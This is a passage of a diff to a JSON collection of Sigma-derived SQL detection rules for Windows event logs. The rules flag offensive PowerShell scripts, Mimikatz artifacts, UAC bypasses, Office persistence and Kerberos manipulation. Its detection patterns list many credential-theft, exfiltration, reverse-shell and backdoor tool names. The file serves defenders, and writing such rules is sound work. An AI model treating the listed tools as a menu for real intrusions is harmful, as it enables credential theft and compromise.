RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' 
ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - 
"description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat 
Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND 
EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - 
